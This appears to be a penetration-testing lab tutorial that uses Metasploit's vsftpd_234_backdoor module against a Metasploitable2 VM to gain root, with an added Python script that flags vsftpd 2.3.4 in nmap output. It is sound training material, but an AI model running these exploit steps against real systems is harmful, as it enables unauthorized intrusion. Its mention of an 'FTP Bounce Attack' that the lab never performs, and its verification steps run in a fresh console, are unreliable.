Exploiting FTP Service Vulnerabilities


Introduction

In this lab, you will learn how to exploit vulnerabilities in the File Transfer Protocol (FTP) service to gain unauthorized access to a target machine. The scenario is set in a cybersecurity context, where you will assume the role of an ethical hacker tasked with identifying and exploiting vulnerabilities in a vulnerable FTP server.

The objective of this lab is to gain root access to the Metasploitable2 target machine by leveraging an FTP service vulnerability and utilizing the Metasploit Framework, a popular penetration testing tool. Through this hands-on experience, you will gain a deeper understanding of the FTP Bounce Attack, port scanning techniques, and the exploitation process using Metasploit.



Set up the Lab Environment

In this step, you will set up the lab environment, which consists of two virtual machines: the Kali Linux machine as the attacker, and the Metasploitable2 machine as the target.

  1. Start the Metasploitable2 virtual machine by running the following command in the terminal:

         sudo virsh start Metasploitable2

  2. Verify that the Metasploitable2 machine is running by pinging it:

         ping 192.168.122.102

     Press Ctrl+C to stop the ping.

  3. Launch the Kali Linux container and enter its bash shell:

         docker run -ti --network host b5b709a49cd5 bash

  4. Test the network connectivity between the Kali Linux container and the Metasploitable2 machine:

         ping 192.168.122.102

     Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

Note: If you accidentally exit the current bash shell, the Kali container stops automatically. Run docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container, enter its bash shell, and continue the lab.

Perform Port Scanning

In this step, you will use the Nmap scanning tool to identify open ports and services running on the Metasploitable2 target machine.

  1. Start the PostgreSQL database service, which is required by Metasploit:

         service postgresql start

  2. Initialize the Metasploit database:

         msfdb init

  3. Launch the Metasploit Framework console:

         cd ~
         msfconsole

  4. Use Nmap to scan the target machine and identify open ports:

         nmap -sV -T4 192.168.122.102

     The -sV option enables service and version detection on open ports, and -T4 selects the aggressive timing template, which speeds up the scan.

Press Ctrl+D to quit the Metasploit console, then start the inspection.

Exploit the FTP Service Vulnerability

In this step, you will leverage the identified FTP service vulnerability to gain unauthorized access to the Metasploitable2 target machine.

  1. If you are not already in the Metasploit console, start it:

         cd ~
         msfconsole

  2. Search for an FTP scanner module in Metasploit:

         search scanner/ftp

  3. Use the ftp_version module to scan the FTP service:

         use auxiliary/scanner/ftp/ftp_version

  4. Set the target host for the scan:

         set RHOSTS 192.168.122.102

  5. Run the FTP version scan:

         exploit

  6. Based on the FTP version identified, search for a corresponding exploitation module:

         search vsFTPd

  7. Use the vsftpd_234_backdoor module to exploit the vulnerability:

         use exploit/unix/ftp/vsftpd_234_backdoor

  8. Set the target host for the exploitation:

         set RHOST 192.168.122.102

  9. Execute the exploitation:

         exploit

Press Ctrl+D to quit the Metasploit console, then start the inspection.
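Seen from the defender's side, the version string that drives the module choice above is also what a service audit should look for. The following is an added example, not part of the original lab: it parses nmap -sV normal output for several hosts and reports every open port running vsftpd 2.3.4, the version named by the vsftpd_234_backdoor module. The function name audit_scan, the FLAGGED set, the second host address and the sample scan text are assumptions constructed for illustration.

```python
import re

# Product/version pairs to flag. The single entry is the version named by the
# vsftpd_234_backdoor module on this page; extend the set for your own policy.
FLAGGED = {("vsftpd", "2.3.4")}

HOST_RE = re.compile(r"^Nmap scan report for (?P<host>\S+)")
# Port table row, e.g. "21/tcp   open  ftp   vsftpd 2.3.4"
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)

def audit_scan(text, flagged=FLAGGED):
    """Return (host, port, product, version) for every open port whose
    detected product and version appear in `flagged`."""
    findings, host = [], None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group("host")  # later port rows belong to this host
            continue
        m = PORT_RE.match(line.strip())
        if not m or m.group("state") != "open":
            continue  # header rows, closed and filtered ports
        words = m.group("version").split()
        if len(words) < 2:
            continue  # version detection returned no product/version pair
        product, version = words[0].lower(), words[1]
        if (product, version) in flagged:
            findings.append((host, int(m.group("port")), product, version))
    return findings

# Constructed sample in the layout of `nmap -sV` normal output.
SAMPLE = """\
Nmap scan report for 192.168.122.102
PORT     STATE    SERVICE VERSION
21/tcp   open     ftp     vsftpd 2.3.4
22/tcp   open     ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
2121/tcp open     ftp     ProFTPD 1.3.1
Nmap scan report for 192.168.122.103
PORT     STATE    SERVICE VERSION
21/tcp   filtered ftp
2100/tcp open     ftp     vsftpd 3.0.5
"""

if __name__ == "__main__":
    for host, port, product, version in audit_scan(SAMPLE):
        print(f"{host}:{port} runs {product} {version}: replace or remove this service")
```

Matching is by detected product and version, not by port number, so a flagged build listening on a non-standard port is still reported.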

Verify the Successful Exploitation

In this step, you will verify that the exploitation was successful and you have gained root access to the Metasploitable2 target machine.

  1. If you are not already in the Metasploit console, start it:

         cd ~
         msfconsole

  2. Check the current user:

         whoami

  3. Check the hostname of the compromised machine:

         hostname

  4. Check the IP address of the compromised machine:

         ifconfig

Press Ctrl+D to quit the Metasploit console, then start the inspection.

Summary

In this lab, you learned how to exploit an FTP service vulnerability to gain unauthorized access to a target machine. You set up a lab environment with a vulnerable Metasploitable2 machine and a Kali Linux attack machine. You performed port scanning using Nmap to identify open ports and services, and then leveraged the Metasploit Framework to exploit an identified FTP service vulnerability. Finally, you verified the successful exploitation by checking the current user, hostname, and IP address of the compromised machine.

Through this hands-on experience, you gained practical knowledge and skills in identifying and exploiting vulnerabilities, using popular cybersecurity tools like Nmap and Metasploit, and understanding the FTP Bounce Attack technique. These skills are essential for ethical hackers and cybersecurity professionals to assess and strengthen the security posture of systems and networks.
